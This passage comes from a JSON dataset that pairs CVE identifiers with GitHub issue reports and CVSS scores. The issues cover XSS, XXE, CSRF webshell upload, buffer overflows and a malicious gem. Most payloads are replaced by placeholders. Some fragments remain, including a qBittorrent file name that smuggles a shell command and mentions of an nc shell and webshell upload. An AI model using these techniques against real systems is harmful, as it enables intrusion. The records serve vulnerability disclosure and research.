  36626. "Issue_Url_new": "https://github.com/rubygems/rubygems.org/issues/2051",
  36627. "Repo_new": "rubygems/rubygems.org",
  36628. "Issue_Created_At": "2019-07-08T20:44:12Z",
  36629. "description": "paranoid2 version NUMBERTAG is compromised and a malware, please yank!. Hi, paranoid2 URLTAG version NUMBERTAG is compromised and a malware. Please remove it! The attack is similar to the recently reported FILETAG and the code snippet is located at: PATHTAG APITAG URLTAG FILETAG",
  36630. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  36631. "severity": "CRITICAL",
  36632. "baseScore": 9.8,
  36633. "impactScore": 5.9,
  36634. "exploitabilityScore": 3.9
  36635. },
  36636. {
  36637. "CVE_ID": "CVE-2019-13611",
  36638. "Issue_Url_old": "https://github.com/miguelgrinberg/python-engineio/issues/128",
  36639. "Issue_Url_new": "https://github.com/miguelgrinberg/python-engineio/issues/128",
  36640. "Repo_new": "miguelgrinberg/python-engineio",
  36641. "Issue_Created_At": "2019-07-14T11:07:57Z",
  36642. "description": "Websocket hijacking vulnerability. CORS headers are only works in XHR requests, and ignored by clients during a websocket connection. Ref: FILETAG ERRORTAG TLDR; ERRORTAG",
  36643. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  36644. "severity": "HIGH",
  36645. "baseScore": 8.8,
  36646. "impactScore": 5.9,
  36647. "exploitabilityScore": 2.8
  36648. },
  36649. {
  36650. "CVE_ID": "CVE-2019-13618",
  36651. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1250",
  36652. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1250",
  36653. "Repo_new": "gpac/gpac",
  36654. "Issue_Created_At": "2019-06-04T08:09:07Z",
  36655. "description": "heap buffer overflow in gf_m2ts_sync. hello\uff0cI found a heap buffer overflow bug in gpac. bug details URLTAG FILETAG",
  36656. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  36657. "severity": "HIGH",
  36658. "baseScore": 7.5,
  36659. "impactScore": 3.6,
  36660. "exploitabilityScore": 3.9
  36661. },
  36662. {
  36663. "CVE_ID": "CVE-2019-13623",
  36664. "Issue_Url_old": "https://github.com/NationalSecurityAgency/ghidra/issues/789",
  36665. "Issue_Url_new": "https://github.com/nationalsecurityagency/ghidra/issues/789",
  36666. "Repo_new": "nationalsecurityagency/ghidra",
  36667. "Issue_Created_At": "2019-07-14T15:31:57Z",
  36668. "description": "Arbitrary code execution through loading a malicious project. Describe the bug A path traversal vulnerability exists in APITAG from package APITAG This vulnerability allows attackers to overwrite arbitrary files in the system. To achieve arbitrary code execution, one of the solutions is to overwrite some critical ghidra modules, e.g., decompile module (In this case we need to know the installation path of ghidra). To Reproduce NUMBERTAG Load the malicious project NUMBERTAG malicious code will be executed when the decompile module is called. Expected behavior Here is a demo of the attack behavior. URLTAG url Environment (please complete the following information): OS: All systems Ghidra Version: until NUMBERTAG Remark The vulnerability was found by researchers from GTISC MENTIONTAG Tech.",
  36669. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  36670. "severity": "HIGH",
  36671. "baseScore": 7.8,
  36672. "impactScore": 5.9,
  36673. "exploitabilityScore": 1.8
  36674. },
  36675. {
  36676. "CVE_ID": "CVE-2019-13625",
  36677. "Issue_Url_old": "https://github.com/NationalSecurityAgency/ghidra/issues/71",
  36678. "Issue_Url_new": "https://github.com/nationalsecurityagency/ghidra/issues/71",
  36679. "Repo_new": "nationalsecurityagency/ghidra",
  36680. "Issue_Created_At": "2019-03-06T21:20:30Z",
  36681. "description": "Project handling is susceptible to XXE. Describe the bug Project open/restore is susceptible to XML External Entity Expansion attacks. This can be exploited in various ways by getting someone to open/restore a project prepared by attacker. To Reproduce Steps to reproduce the behavior NUMBERTAG Create a project, and close it NUMBERTAG Put an XXE payload in any of the XML files in the project directory (see screenshot for example NUMBERTAG Open the project NUMBERTAG Observe your payload doing its thing. The same concept works with archived projects (.gar files) too. Expected behavior The XML parser should ignore external entities. For bonus points, it should give an error/warning when they are present. Screenshots The following screenshot was made of a proof of concept that only issues an HTTP GET request to localhost. Ghidra XXE APITAG URLTAG Environment (please complete the following information): OS: Kali Linux Rolling JDK Version: APITAG NUMBERTAG APITAG Debian NUMBERTAG Ghidra Version NUMBERTAG",
  36682. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H",
  36683. "severity": "CRITICAL",
  36684. "baseScore": 9.1,
  36685. "impactScore": 5.2,
  36686. "exploitabilityScore": 3.9
  36687. },
  36688. {
  36689. "CVE_ID": "CVE-2019-13640",
  36690. "Issue_Url_old": "https://github.com/qbittorrent/qBittorrent/issues/10925",
  36691. "Issue_Url_new": "https://github.com/qbittorrent/qbittorrent/issues/10925",
  36692. "Repo_new": "qbittorrent/qbittorrent",
  36693. "Issue_Created_At": "2019-07-15T00:04:58Z",
  36694. "description": "FILETAG . Also UTF NUMBERTAG Steps to reproduce NUMBERTAG Configure APITAG to run an external script in Preferences Downloads. Anything is valid. You can even quote the arguments. For example: APITAG NUMBERTAG Create a new torrent with the following command: APITAG To test it locally with already created content, without needing to upload your torrent to a public tracker, create a directory named APITAG firefox ; \"' (without the first and last quotes) that has the same values as the previous command's APITAG This will re hash the content and mark it as completed, executing the script. You can use midnight commander to do this NUMBERTAG When the torrent download finishes, Firefox is opened Greetings",
  36695. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  36696. "severity": "CRITICAL",
  36697. "baseScore": 9.8,
  36698. "impactScore": 5.9,
  36699. "exploitabilityScore": 3.9
  36700. },
  36701. {
  36702. "CVE_ID": "CVE-2019-13643",
  36703. "Issue_Url_old": "https://github.com/espocrm/espocrm/issues/1349",
  36704. "Issue_Url_new": "https://github.com/espocrm/espocrm/issues/1349",
  36705. "Repo_new": "espocrm/espocrm",
  36706. "Issue_Created_At": "2019-07-12T13:10:20Z",
  36707. "description": "Stored XSS in Stream messages APITAG NUMBERTAG Description Current version of APITAG NUMBERTAG is vulnerable to stored XSS due to lack of filtration of user supplied data in Stream messages. Malicious attacker can create specially crafted link, which contains javascript code and assign it to any user in the system. After the link is clicked malicious javascript code will be executed in user browser. APITAG Make the following request (insert your authentication data and hostname) CODETAG Then open the notifications and click the link. FILETAG",
  36708. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  36709. "severity": "MEDIUM",
  36710. "baseScore": 6.1,
  36711. "impactScore": 2.7,
  36712. "exploitabilityScore": 2.8
  36713. },
  36714. {
  36715. "CVE_ID": "CVE-2019-13644",
  36716. "Issue_Url_old": "https://github.com/firefly-iii/firefly-iii/issues/2335",
  36717. "Issue_Url_new": "https://github.com/firefly-iii/firefly-iii/issues/2335",
  36718. "Repo_new": "firefly-iii/firefly-iii",
  36719. "Issue_Created_At": "2019-07-15T14:27:10Z",
  36720. "description": "Stored XSS in budget name. Description Current version of Firefly III Version NUMBERTAG is vulnerable to stored XSS due to lack of filtration of user supplied data in budget name. Malicious attacker can create specially crafted link, which contains javascript code and assign it to budget name. User who add transactions with malicious budget, can view page with that transaction on tag summary page ( URLTAG malicious javascript code will be executed. Steps to reproduce I create a small video for reproduce steps FILETAG APITAG CODETAG APITAG",
  36721. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  36722. "severity": "MEDIUM",
  36723. "baseScore": 5.4,
  36724. "impactScore": 2.7,
  36725. "exploitabilityScore": 2.3
  36726. },
  36727. {
  36728. "CVE_ID": "CVE-2019-13645",
  36729. "Issue_Url_old": "https://github.com/firefly-iii/firefly-iii/issues/2337",
  36730. "Issue_Url_new": "https://github.com/firefly-iii/firefly-iii/issues/2337",
  36731. "Repo_new": "firefly-iii/firefly-iii",
  36732. "Issue_Created_At": "2019-07-16T11:57:57Z",
  36733. "description": "Stored XSS in filename. Description Current version of Firefly III Version NUMBERTAG is vulnerable to stored XSS due to lack of filtration of user supplied data in file names. Malicious attacker can upload specially crafted image, which contains javascript code in its name. Malicious javascript code will be executed when user edit this attachment ( URLTAG But this file can be created only on Linux or you can edit field name in local proxy (e.g. Burp Suite) If you want to edit request you should change this part of request, mainly filename part ERRORTAG Request ERRORTAG Steps to reproduce NUMBERTAG Download attached zip file and extract image (but it works only on Linux 'cause of characters in filename NUMBERTAG Create new or update exist transaction and upload file NUMBERTAG After uploaded attachment go to attachment page and click to edit this file APITAG image APITAG Image for testing FILETAG",
  36734. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  36735. "severity": "MEDIUM",
  36736. "baseScore": 5.4,
  36737. "impactScore": 2.7,
  36738. "exploitabilityScore": 2.3
  36739. },
  36740. {
  36741. "CVE_ID": "CVE-2019-13646",
  36742. "Issue_Url_old": "https://github.com/firefly-iii/firefly-iii/issues/2339",
  36743. "Issue_Url_new": "https://github.com/firefly-iii/firefly-iii/issues/2339",
  36744. "Repo_new": "firefly-iii/firefly-iii",
  36745. "Issue_Created_At": "2019-07-16T11:58:01Z",
  36746. "description": "Reflected XSS in search query. Description Current version of Firefly III Version NUMBERTAG is vulnerable to reflected XSS due to lack of filtration of user supplied data in search query. Malicious attacker can create specially crafted request, which contains javascript code in it. Malicious javascript code will be executed when user open this link. This can be easely reproduced in Mozilla Firefox and if you want to reproduce it in Chrome you should first turn off XSS auditor in IT Request http:// insert your host here APITAG APITAG image APITAG",
  36747. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  36748. "severity": "MEDIUM",
  36749. "baseScore": 5.4,
  36750. "impactScore": 2.7,
  36751. "exploitabilityScore": 2.3
  36752. },
  36753. {
  36754. "CVE_ID": "CVE-2019-13647",
  36755. "Issue_Url_old": "https://github.com/firefly-iii/firefly-iii/issues/2338",
  36756. "Issue_Url_new": "https://github.com/firefly-iii/firefly-iii/issues/2338",
  36757. "Repo_new": "firefly-iii/firefly-iii",
  36758. "Issue_Created_At": "2019-07-16T11:57:58Z",
  36759. "description": "Stored XSS in file content. Description Current version of Firefly III Version NUMBERTAG is vulnerable to stored XSS due to lack of filtration of user supplied data in files content. Malicious attacker can upload specially crafted image, which contains javascript code. Malicious javascript code will be executed when user view this attachment ( URLTAG Steps to reproduce NUMBERTAG Download attached zip file and extract svg image or create svg file with contains from bottom NUMBERTAG Create new or update exist transaction and upload svgfile.svg NUMBERTAG After uploaded attachment click on filename APITAG image APITAG Image for testing FILETAG Content of svgfile.svg CODETAG",
  36760. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  36761. "severity": "MEDIUM",
  36762. "baseScore": 5.4,
  36763. "impactScore": 2.7,
  36764. "exploitabilityScore": 2.3
  36765. },
  36766. {
  36767. "CVE_ID": "CVE-2019-13951",
  36768. "Issue_Url_old": "https://github.com/gdnsd/gdnsd/issues/185",
  36769. "Issue_Url_new": "https://github.com/gdnsd/gdnsd/issues/185",
  36770. "Repo_new": "gdnsd/gdnsd",
  36771. "Issue_Created_At": "2019-07-18T13:16:22Z",
  36772. "description": "Multiple stack based buffer overflow. Hi, I found two occurences of stack based buffer overflow when fuzzing gdnsd with American Fuzzy Lop NUMBERTAG The first occurence happens in the APITAG function, in zscan_rfc NUMBERTAG rl, and can be triggered with the following input: APITAG The issue can be be reproduced by creating a 'zones' directory, putting the above input in a file within the 'zones' directory, and running: APITAG Because no bounds checking is being done in the APITAG function, 'len' ends up being larger than NUMBERTAG ERRORTAG It seems your parser is attempting to parse malformed IP NUMBERTAG addresses until there is no input left, as I have been able to get 'len' to reach very large values when generating malformed IP NUMBERTAG address strings spawning several gigabytes, which gdnsd will happily attempt to parse NUMBERTAG The second occurence happens in the APITAG function, in zscan_rfc NUMBERTAG rl, and can be triggered with the following input: APITAG Because no bounds checking is being done in the APITAG function, 'len' ends up being larger than INET6_ADDRSTRLEN NUMBERTAG ERRORTAG As previously, the parser will happily parse malformed IP NUMBERTAG address strings spawning several gigabytes.",
  36773. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  36774. "severity": "CRITICAL",
  36775. "baseScore": 9.8,
  36776. "impactScore": 5.9,
  36777. "exploitabilityScore": 3.9
  36778. },
  36779. {
  36780. "CVE_ID": "CVE-2019-13959",
  36781. "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/394",
  36782. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/394",
  36783. "Repo_new": "axiomatic-systems/bento4",
  36784. "Issue_Created_At": "2019-05-14T06:23:56Z",
  36785. "description": "Null Pointer Dereference(npd) Bug. Hi, recently when I experience the new version of bento4. I find an NPD bug in program \"mp NUMBERTAG aac\". The bug logic is that when the data size is not large enough and apply reallocation, the reallocation does not check whether the new buffer is successfully allocated. This is the execution trace. FILETAG In APITAG the function realloc buffer when new size is larger then current one. This means the two values of two size variable are not zero. FILETAG In reallocation, there is no null pointer check for the return value of the allocation and leads to the crash when apply APITAG which is an alias of memcpy function. I have uploaded the report and related bug trace to help understand this problem. FILETAG",
  36786. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  36787. "severity": "MEDIUM",
  36788. "baseScore": 6.5,
  36789. "impactScore": 3.6,
  36790. "exploitabilityScore": 2.8
  36791. },
  36792. {
  36793. "CVE_ID": "CVE-2019-13960",
  36794. "Issue_Url_old": "https://github.com/libjpeg-turbo/libjpeg-turbo/issues/337",
  36795. "Issue_Url_new": "https://github.com/libjpeg-turbo/libjpeg-turbo/issues/337",
  36796. "Repo_new": "libjpeg-turbo/libjpeg-turbo",
  36797. "Issue_Created_At": "2019-02-27T12:18:55Z",
  36798. "description": "Potential memory leak bug. Recently, I use my fuzzer to check the project and find a memory leak or potential overflow problem. This is the version: APITAG This is the input: FILETAG You can use ./djpeg file to reproduce the memory leak. APITAG This is the result with gdb.",
  36799. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  36800. "severity": "MEDIUM",
  36801. "baseScore": 5.5,
  36802. "impactScore": 3.6,
  36803. "exploitabilityScore": 1.8
  36804. },
  36805. {
  36806. "CVE_ID": "CVE-2019-13961",
  36807. "Issue_Url_old": "https://github.com/flatCore/flatCore-CMS/issues/39",
  36808. "Issue_Url_new": "https://github.com/flatcore/flatcore-cms/issues/39",
  36809. "Repo_new": "flatcore/flatcore-cms",
  36810. "Issue_Created_At": "2019-05-26T14:41:54Z",
  36811. "description": "Bug Report: CSRF Vulnerability in FILETAG on APITAG Title: CSRF Vulnerability in FILETAG on APITAG Date NUMBERTAG May NUMBERTAG Discovered by: MENTIONTAG from ABT Labs Security: high (will cause the webshell to upload) Software: FILETAG Code: FILETAG There is no csrf check, only have a administrator APITAG there is no check on the file type, and did not change the uploaded file name) FILETAG Description: Using Cross Site Request Forgery (CSRF), an attacker can force a user who is currently authenticated with a web application to execute an unwanted action. The attacker can trick the user into loading a page which may send a request to perform the unwanted action in the background. Exploit: We assume that APITAG is installed at URLTAG Our target is PATHTAG which is the page used to upload a new file. The given POC will upload a webshell to the website which has full administrator privileges. APITAG APITAG APITAG APITAG ERRORTAG APITAG APITAG APITAG APITAG APITAG ERRORTAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG ERRORTAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG Before visit the POC, make sure you are logged in into an administrator account. Then open the HTML file and submit the form. The webshell have been uploaded. Screenshots: First, administrator login. FILETAG Then, administrator visit the malicious webpage. FILETAG Attacker visit webshell. FILETAG Suggest: Check CSRF tokens in all POST request.",
  36812. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  36813. "severity": "HIGH",
  36814. "baseScore": 8.8,
  36815. "impactScore": 5.9,
  36816. "exploitabilityScore": 2.8
  36817. },
  36818. {
  36819. "CVE_ID": "CVE-2019-13970",
  36820. "Issue_Url_old": "https://github.com/AntSwordProject/antSword/issues/151",
  36821. "Issue_Url_new": "https://github.com/antswordproject/antsword/issues/151",
  36822. "Repo_new": "antswordproject/antsword",
  36823. "Issue_Created_At": "2019-04-18T10:37:47Z",
  36824. "description": "APITAG self XSS Vulnerability leads to RCE. APITAG APITAG APITAG APITAG ERRORTAG APITAG \u5f00\u542fnc NUMBERTAG shell APITAG \u6216\u8005\u4f60\u53ea\u60f3\u5f39\u4e2a\u7a97\u4e5f\u884c APITAG self xss\u4e5f\u8bf7\u4fee\u590d\u4e00\u4e0b :D",
  36825. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  36826. "severity": "MEDIUM",
  36827. "baseScore": 6.1,
  36828. "impactScore": 2.7,
  36829. "exploitabilityScore": 2.8
  36830. },
  36831. {
  36832. "CVE_ID": "CVE-2019-13979",
  36833. "Issue_Url_old": "https://github.com/directus/api/issues/979",
  36834. "Issue_Url_new": "https://github.com/directus/v8-archive/issues/979",
  36835. "Repo_new": "directus/v8-archive",
  36836. "Issue_Created_At": "2019-05-28T17:04:12Z",
  36837. "description": "FILETAG It was also possible to see that every user has a direct access to the uploaded file: FILETAG And FILETAG Once, an attacker knows which type of shell he needs the next step is uploading web shell itself: FILETAG It is possible to see that an attacker is able to run commands on the backend server itself, thus can completely compromise the server. What problem does this feature solve? Fixes security hole. How do you think this should be implemented? The uploaded file types must be restricted only to the necessary file types and be validated on the server side. Uploaded directory should not have any execute permission and all the script handlers should be removed from these directories. Would you be willing to work on this? Maybe, with help/guidance from Directus team.",
  36838. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  36839. "severity": "HIGH",
  36840. "baseScore": 8.8,
  36841. "impactScore": 5.9,
  36842. "exploitabilityScore": 2.8
  36843. },
  36844. {
  36845. "CVE_ID": "CVE-2019-13981",
  36846. "Issue_Url_old": "https://github.com/directus/api/issues/986",
  36847. "Issue_Url_new": "https://github.com/directus/v8-archive/issues/986",
  36848. "Repo_new": "directus/v8-archive",
  36849. "Issue_Created_At": "2019-05-28T21:05:53Z",
  36850. "description": "FILETAG What problem does this feature solve? Fixes security hole. How do you think this should be implemented? Do not let users to get access to upload files that were uploaded by another users. Image ID should be chosen by unpredictable way and one time random token should be appended to the link in order to prevent exact link guessing. Implement an authorization mechanism that validate if user authorized to view or download the specific file. Would you be willing to work on this? Maybe, with help/guidance from Directus team.",
  36851. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  36852. "severity": "MEDIUM",
  36853. "baseScore": 5.3,
  36854. "impactScore": 1.4,
  36855. "exploitabilityScore": 3.9
  36856. },
  36857. {
  36858. "CVE_ID": "CVE-2019-13981",
  36859. "Issue_Url_old": "https://github.com/directus/api/issues/987",
  36860. "Issue_Url_new": "https://github.com/directus/v8-archive/issues/987",
  36861. "Repo_new": "directus/v8-archive",
  36862. "Issue_Created_At": "2019-05-28T21:40:03Z",
  36863. "description": "FILETAG What problem does this feature solve? Fixes security hole. How do you think this should be implemented? As a general rule, system components should not be accessible to unauthenticated users (excluding the authentication component, which is unique, as unauthenticated access to it is a functional requirement). The authentication enforcement mechanism should be thoroughly and comprehensively implemented in the system. The authentication validation should be performed as the first validation in each access to the system. The accessing entity should be obligated to authenticate with the system as a pre condition to use the system\u2019s services. After a successful authentication process, the user server side session storage should be \"populated\" with the permissions of authorized actions. It is recommended to use authentication enforcement mechanisms that operate globally (effectively affecting all components), instead of implementing authentication validation within each separate component. Authentication validation implementation through applicative filters or infrastructure authentication declarations is highly recommended, since it is less likely to be prone to authentication flaws resulting from human error. Furthermore, these mechanisms are easier to manage and are usually well tested and widely used. Would you be willing to work on this? Maybe, with help/guidance from Directus team.",
  36864. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  36865. "severity": "MEDIUM",
  36866. "baseScore": 5.3,
  36867. "impactScore": 1.4,
  36868. "exploitabilityScore": 3.9
  36869. },
  36870. {
  36871. "CVE_ID": "CVE-2019-13983",
  36872. "Issue_Url_old": "https://github.com/directus/api/issues/991",
  36873. "Issue_Url_new": "https://github.com/directus/v8-archive/issues/991",
  36874. "Repo_new": "directus/v8-archive",
  36875. "Issue_Created_At": "2019-05-30T11:03:57Z",
  36876. "description": "[SECURITY] Insufficient Anti Automation \u2013 Brute Force Attack. Feature Request About audited Directus version. It has been cloned from suite repo. Latest commit URLTAG Description: Insufficient Anti automation occurs when a web application permits an attacker to automate a process that was originally designed to be performed only in a manual fashion, i.e. by a human web user. Business risk: Once exploited, attackers can use an automatic tool or a simple script that performs a brute force authentication attempts, and possible cause a legitimate user lock out. Technical details: The login mechanism of the application does not prevent a brute force on login attempts and on change password function. What problem does this feature solve? Fixes security hole. How do you think this should be implemented? Implement an anti automation mechanism such as CAPTCHA Note: do not use account locking, because of the ability to perform a APITAG on user accounts. Complementary instructions for protecting brute forcing on users can be found in the following URL: URLTAG URLTAG Would you be willing to work on this? Maybe, with help/guidance from Directus team.",
  36877. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  36878. "severity": "CRITICAL",
  36879. "baseScore": 9.8,
  36880. "impactScore": 5.9,
  36881. "exploitabilityScore": 3.9
  36882. },
  36883. {
  36884. "CVE_ID": "CVE-2019-13990",
  36885. "Issue_Url_old": "https://github.com/quartz-scheduler/quartz/issues/467",
  36886. "Issue_Url_new": "https://github.com/quartz-scheduler/quartz/issues/467",
  36887. "Repo_new": "quartz-scheduler/quartz",
  36888. "Issue_Created_At": "2019-07-22T06:36:17Z",
  36889. "description": "Security: XXE in APITAG The method APITAG in the APITAG does not forbid DTDs, which allows a context dependend attacker to perfom an XXE URLTAG . I reported this issue to the MITRE cooperation already which assigned the identifier CVETAG to this vulnerability. The OWASP Foundation provides an FILETAG that explains in detail the steps to prevent this security issue.",
  36890. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  36891. "severity": "CRITICAL",
  36892. "baseScore": 9.8,
  36893. "impactScore": 5.9,
  36894. "exploitabilityScore": 3.9
  36895. },
  36896. {
  36897. "CVE_ID": "CVE-2019-14241",
  36898. "Issue_Url_old": "https://github.com/haproxy/haproxy/issues/181",
  36899. "Issue_Url_new": "https://github.com/haproxy/haproxy/issues/181",
  36900. "Repo_new": "haproxy/haproxy",
  36901. "Issue_Created_At": "2019-07-22T10:19:51Z",
  36902. "description": "Haproxy NUMBERTAG stuck thread. APITAG Output of APITAG and ERRORTAG ERRORTAG What's the configuration? APITAG Thread NUMBERTAG act NUMBERTAG glob NUMBERTAG wq NUMBERTAG rq NUMBERTAG tl NUMBERTAG tlsz NUMBERTAG rqsz NUMBERTAG haproxy NUMBERTAG stuck NUMBERTAG fdcache NUMBERTAG prof NUMBERTAG harmless NUMBERTAG wantrd NUMBERTAG haproxy NUMBERTAG cpu_ns: poll NUMBERTAG now NUMBERTAG diff NUMBERTAG haproxy NUMBERTAG curr_task NUMBERTAG e NUMBERTAG ce6b0 (task) calls NUMBERTAG last NUMBERTAG haproxy NUMBERTAG fct NUMBERTAG e NUMBERTAG a NUMBERTAG process_stream) ct NUMBERTAG e NUMBERTAG haproxy NUMBERTAG strm NUMBERTAG e NUMBERTAG APITAG fe=standaardsite APITAG dst=unknown haproxy NUMBERTAG rqf NUMBERTAG rqa NUMBERTAG rpf NUMBERTAG rpa NUMBERTAG sif=EST NUMBERTAG sib=INI NUMBERTAG haproxy NUMBERTAG af=(nil NUMBERTAG csf NUMBERTAG e NUMBERTAG b NUMBERTAG haproxy NUMBERTAG ab=(nil NUMBERTAG csb=(nil NUMBERTAG haproxy NUMBERTAG APITAG haproxy NUMBERTAG APITAG haproxy NUMBERTAG ALERT NUMBERTAG Current worker NUMBERTAG exited with code NUMBERTAG APITAG haproxy NUMBERTAG ALERT NUMBERTAG exit on failure: killing every processes with SIGTERM haproxy NUMBERTAG WARNING NUMBERTAG All workers exited. Exiting NUMBERTAG systemd NUMBERTAG APITAG Main process exited, code=exited, PATHTAG systemd NUMBERTAG APITAG Failed with result 'exit code'. systemd NUMBERTAG APITAG Service hold off time over, scheduling restart. systemd NUMBERTAG APITAG Scheduled restart job, restart counter is at NUMBERTAG On our fallback APITAG instances (running NUMBERTAG and earlier) we have not seen this behaviour.",
  36903. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  36904. "severity": "HIGH",
  36905. "baseScore": 7.5,
  36906. "impactScore": 3.6,
  36907. "exploitabilityScore": 3.9
  36908. },
  36909. {
  36910. "CVE_ID": "CVE-2019-14243",
  36911. "Issue_Url_old": "https://github.com/mastercactapus/caddy-proxyprotocol/issues/8",
  36912. "Issue_Url_new": "https://github.com/mastercactapus/caddy-proxyprotocol/issues/8",
  36913. "Repo_new": "mastercactapus/caddy-proxyprotocol",
  36914. "Issue_Created_At": "2019-07-22T18:27:29Z",
  36915. "description": "Denial of service vulnerability with invalid NUMBERTAG PROXY data. I opened an issue describing a APITAG vulnerability in the APITAG package used by this plugin: URLTAG This code is the only consumer of the package I was able to find with light googling/github searching. Since fixing the APITAG parsing bug will require an updated version of this plugin I wanted to file an issue here as well so it doesn't fall through the cracks.",
  36916. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  36917. "severity": "HIGH",
  36918. "baseScore": 7.5,
  36919. "impactScore": 3.6,
  36920. "exploitabilityScore": 3.9
  36921. },
  36922. {
  36923. "CVE_ID": "CVE-2019-14243",
  36924. "Issue_Url_old": "https://github.com/mastercactapus/proxyprotocol/issues/1",
  36925. "Issue_Url_new": "https://github.com/mastercactapus/proxyprotocol/issues/1",
  36926. "Repo_new": "mastercactapus/proxyprotocol",
  36927. "Issue_Created_At": "2019-07-22T18:25:46Z",
  36928. "description": "Invalid NUMBERTAG PROXY data causes parsing panics/denial of service. :wave: hi MENTIONTAG I was looking into the APITAG NUMBERTAG PROXY protocol and found your package. Unfortunately I found a class of crasher bugs when the library is presented malformed input. The APITAG 's APITAG function doesn't validate that the length of the buffered data is large enough to ensure that the slicing done to extract src/dest IP addresses (and ports where applicable) won't be out of bounds. Here's a small reproduction program: ERRORTAG The inline comment shows where the panic occurs. You can change the panic location by switching the APITAG byte to one of the other supported APITAG values in the parsing switch statement URLTAG . All supported APITAG 's are affected by this class of bug. Notably this results in a trivial denial of service attack against upstream consumers of this package. I was able to reproduce this crash with your caddy proxyprotocol URLTAG plugin, Caddy NUMBERTAG and the following Caddy file: APITAG Here's the output from the Caddy server after receiving the payload from the reproduction above: ERRORTAG I think its likely worth treating this as a denial of service vulnerability and releasing a new version of both this library and the upstream APITAG plugin with a note indicating users should upgrade. As an additional note because of when this panic occurs there is no audit trail in the configured APITAG and it brings down the entire webserver, not just the Go routine handling the request. Unfortunately I don't have the cycles to develop a fix for this bug. I'm not a Caddy user or a APITAG user, just a curious dev.",
  36929. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  36930. "severity": "HIGH",
  36931. "baseScore": 7.5,
  36932. "impactScore": 3.6,
  36933. "exploitabilityScore": 3.9
  36934. },
  36935. {
  36936. "CVE_ID": "CVE-2019-14268",
  36937. "Issue_Url_old": "https://github.com/OctopusDeploy/Issues/issues/5739",
  36938. "Issue_Url_new": "https://github.com/octopusdeploy/issues/issues/5739",
  36939. "Repo_new": "octopusdeploy/issues",
  36940. "Issue_Created_At": "2019-07-25T01:42:06Z",
  36941. "description": "Placeholder. Relates to: APITAG NUMBERTAG Full details to come shortly. Prerequisites ] We are ready to publicly disclose this vulnerability or exploit according to our [responsible disclosure process URLTAG . ] I have raised a CVE according to our [CVE process URLTAG [ ] I have written a descriptive issue title [ ] I have linked the original source of this report [ ] I have tagged the issue appropriately (area/security, kind/bug, tag/regression?) Description APITAG Affected versions APITAG Octopus Server: Mitigation APITAG Workarounds APITAG",
  36942. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  36943. "severity": "MEDIUM",
  36944. "baseScore": 6.5,
  36945. "impactScore": 3.6,
  36946. "exploitabilityScore": 2.8
  36947. },
  36948. {
  36949. "CVE_ID": "CVE-2019-14271",
  36950. "Issue_Url_old": "https://github.com/moby/moby/issues/39449",
  36951. "Issue_Url_new": "https://github.com/moby/moby/issues/39449",
  36952. "Repo_new": "moby/moby",
  36953. "Issue_Created_At": "2019-07-01T23:53:44Z",
  36954. "description": "docker cp broken with debian containers (arm). Description docker cp is broken with Debian containers (on armhf). Steps to reproduce the issue NUMBERTAG install the latest docker NUMBERTAG on armhf NUMBERTAG APITAG NUMBERTAG APITAG Describe the results you received: ERRORTAG Describe the results you expected: Work. Additional information you deem important (e.g. issue happens only occasionally): This works fine with: Alpine (musl) APITAG This also works fine with Debian on D4M using NUMBERTAG RC2 Output of docker version : ERRORTAG Output of docker info : ERRORTAG Additional environment details (AWS, APITAG physical, etc.): raspberry pi Either this is limited to armhf, or this is only in RC3 and not in RC2. MENTIONTAG also hinted at: URLTAG URLTAG",
  36955. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
